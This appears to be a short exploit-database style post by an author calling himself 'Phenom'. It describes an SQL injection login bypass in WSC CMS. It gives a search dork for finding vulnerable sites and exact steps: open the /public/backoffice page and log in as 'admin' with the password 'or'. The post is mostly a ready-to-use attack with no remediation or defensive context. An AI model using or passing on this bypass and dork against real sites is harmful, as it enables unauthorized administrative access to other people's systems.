------------------------------------------------------
------------------------------------------------------
_____ _
| __ \| |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################